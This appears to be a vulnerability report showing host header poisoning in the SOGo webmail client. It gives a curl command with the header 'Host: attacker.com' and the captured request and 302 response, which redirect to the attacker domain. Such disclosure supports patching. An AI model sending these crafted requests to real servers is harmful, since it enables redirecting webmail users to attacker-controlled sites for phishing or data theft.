| Description | The SOGo webmail client is vulnerable to host header poisoning, a security flaw where an attacker can manipulate the Host header in HTTP requests to redirect users or exploit web application behaviors. This can lead to various attacks, including phishing or unauthorized access to sensitive data. |
|---|
| Steps To Reproduce |
- Issue the following curl command:
curl --path-as-is -i -s -k -X $'GET' \
-H $'Host: attacker.com' -H $'Cache-Control: no-cache' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8' ' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: http://192.168.2.84/' -H $'DNT: 1' -H $'Sec-GPC: 1' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Priority: u=0, i' -H $'Cookie: 0xHIGHFLYxSOGo=' \
$'http://domain.com/SOGo/admin%40test.com/view?'
- Observe that the application accepts the request with the malicious host header and redirects to the attacker-controlled webserver.
GET /SOGo/admin%40test.com/view? HTTP/1.1
Host: attacker.com
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.2.84/
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: ...snip...
Priority: u=0, i
HTTP/1.1 302 Found
Server: nginx
Date: Sat, 14 Sep 2024 23:38:31 GMT
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Location: http://attacker.com/SOGo/so/admin@test.com/Mail
Strict-Transport-Security: max-age=15768000;
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin |
|---|
